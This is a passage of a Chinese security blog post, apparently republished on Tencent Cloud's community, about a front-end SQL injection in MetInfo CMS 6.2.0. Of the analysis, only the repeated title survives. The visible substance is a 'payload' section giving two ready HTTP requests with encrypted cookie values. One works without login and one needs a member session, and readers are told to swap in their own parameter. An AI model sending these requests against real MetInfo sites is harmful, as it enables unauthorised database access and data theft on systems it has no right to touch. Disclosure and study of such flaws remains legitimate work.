前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >漏洞分析丨metinfo 6.2.0最新版本前台注入分析

漏洞分析丨metinfo 6.2.0最新版本前台注入分析

作者头像
C4rpeDime
发布2020-01-20 11:44:41
7260
发布2020-01-20 11:44:41
举报
文章被收录于专栏:黑白安全
漏洞分析丨metinfo 6.2.0最新版本前台注入分析
漏洞分析丨metinfo 6.2.0最新版本前台注入分析
漏洞分析丨metinfo 6.2.0最新版本前台注入分析
漏洞分析丨metinfo 6.2.0最新版本前台注入分析
漏洞分析丨metinfo 6.2.0最新版本前台注入分析
漏洞分析丨metinfo 6.2.0最新版本前台注入分析
漏洞分析丨metinfo 6.2.0最新版本前台注入分析
漏洞分析丨metinfo 6.2.0最新版本前台注入分析
漏洞分析丨metinfo 6.2.0最新版本前台注入分析
漏洞分析丨metinfo 6.2.0最新版本前台注入分析
漏洞分析丨metinfo 6.2.0最新版本前台注入分析
漏洞分析丨metinfo 6.2.0最新版本前台注入分析
漏洞分析丨metinfo 6.2.0最新版本前台注入分析
漏洞分析丨metinfo 6.2.0最新版本前台注入分析
漏洞分析丨metinfo 6.2.0最新版本前台注入分析
漏洞分析丨metinfo 6.2.0最新版本前台注入分析
漏洞分析丨metinfo 6.2.0最新版本前台注入分析
漏洞分析丨metinfo 6.2.0最新版本前台注入分析
漏洞分析丨metinfo 6.2.0最新版本前台注入分析
漏洞分析丨metinfo 6.2.0最新版本前台注入分析
漏洞分析丨metinfo 6.2.0最新版本前台注入分析
漏洞分析丨metinfo 6.2.0最新版本前台注入分析
漏洞分析丨metinfo 6.2.0最新版本前台注入分析
漏洞分析丨metinfo 6.2.0最新版本前台注入分析
漏洞分析丨metinfo 6.2.0最新版本前台注入分析
漏洞分析丨metinfo 6.2.0最新版本前台注入分析
漏洞分析丨metinfo 6.2.0最新版本前台注入分析
漏洞分析丨metinfo 6.2.0最新版本前台注入分析

payload

这里有两个,一个是不需要登陆就可注入,另一个是coolcat表哥所说的需要以会员登陆。以下请自行替换p参数。

1、不需要登陆

代码语言:javascript
复制
GET /admin/index.php?n=user&m=web&c=register&a=doemailvild HTTP/1.1
Cookie: p=00c7%2FDBwD23b41olxVCthTvDDTRBhldmrrdyA8S3t%2F3yAl4QZ0P%2FSfOS5zlB

2、 需要登陆

代码语言:javascript
复制
GET /admin/index.php?n=user&m=web&c=profile&a=dosafety_emailadd HTTP/1.1
Cookie: p=497cD9UpkDtsvFzU9IKNlPvSyg1z%2bf09cmp8hqUeyJW9ekvPfJqx8cLKFSHr;<自行添加登陆后的cookie>
本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。
原始发表:2019-04-035,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • payload
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档